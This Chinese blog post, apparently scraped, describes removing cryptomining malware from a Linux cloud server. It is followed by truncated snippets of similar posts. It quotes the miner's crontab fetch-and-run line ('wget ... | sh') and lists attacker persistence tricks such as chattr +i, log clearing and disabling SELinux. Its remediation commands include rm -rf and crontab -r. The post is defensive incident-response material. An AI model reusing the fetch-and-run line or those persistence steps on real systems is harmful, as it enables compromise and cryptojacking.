雲主機被挖礦過程解決?

2021-09-20 06:47:45 字數 1368 閱讀 2676

一、記錄j總雲主機被挖礦

1、top命令檢視資源佔用率

2、ps -ef | grep ***x 檢視該程序

how to solve?

1、crontab -l; 檢視當前使用者的定時任務

2、crontab -e; 輸入i,變成insert模式,在內容前加 「#」,把內容注釋掉,然後wq儲存退出。

挖礦**:wget -q -o -  | sh > /dev/null 2>&1
把程序kill掉,kill -9 ***;切換成root使用者,

同時把wget包解除安裝掉,yum remove wget

1、使用top命令檢視:

2、使用top已經知道了程序號,接下來看看位置,命令ls -l proc//exe

[hadoop@hadoop hadoop-2.6.0-cdh5.7.0]$ ls -l /proc/8062/exe

lrwxrwxrwx 1 hadoop hadoop 0 oct 17 14:31 /proc/8062/exe -> /tmp/sysupdate

[hadoop@hadoop hadoop-2.6.0-cdh5.7.0]$ ls -l /proc/8114/exe

lrwxrwxrwx 1 hadoop hadoop 0 oct 17 14:31 /proc/8114/exe -> /tmp/networkservice

3、sysupdate、networkservice都在/tmp/目錄下

到/tmp目錄下,除了sysupdate、networkservice 同時還有sysguard、update.sh,除了update.sh其餘的都是二進位制檔案,應該就是挖礦的主程式以及守護程式了。

提取碼:s06o

解決:

rm /var/spool/cron/root 或crontab -r
第二步:殺掉程序和刪除檔案

1、殺掉程序:

[hadoop@hadoop hadoop-2.6.0-cdh5.7.0]$ kill -9 8062

[hadoop@hadoop hadoop-2.6.0-cdh5.7.0]$ kill -9 8114

2、刪除/tmp目錄下的檔案:

[root@hadoop tmp]

# rm -rf kow656kd networkservice sora.x86 sysguard sysupdate sysupdates update.sh

雲主機被挖礦病毒感染的處理過程

舍友在宿舍喊著,我的這個雲主機好卡啊,難受啊!我讓他用top命令看一下cpu占用。一看嚇一跳,乙個叫做sysupdate的程序佔據了絕大部分的cpu資源。cpu使用率接近100 看來肯定是被當礦機了。然後就是新增定時任務,為檔案新增chattr i,修改iptables,清楚日誌,關閉selinux...

阿里雲被挖礦程序wnTKYg入侵的解決方法

殺wntkyg病毒分兩步,第一是找到它的 切斷入口,第二步,找到它的守護程序並殺死,然後再去殺死病毒程序,有的守護程序很隱蔽,喚醒病毒之後,自動消亡,這時候top就看不到了,要留心。最近專案在做效能測試,發現cpu使用率異常,無人訪問時cpu也一直保持75 然後在xshell上top了一下,發現wn...

阿里雲伺服器被挖礦minerd入侵的解決辦法

hu wen遇到的和我最相似,下邊是他的解決辦法 但我去檢視啟動的服務,盡然沒有 lady 這個服務。找不到始作俑者,那個minerd程序刪掉就又起來了,後來想了個臨時辦法,先停掉了挖礦的程序 1.關閉訪問挖礦伺服器的訪問iptables a input s xmr.crypto pool.fr j...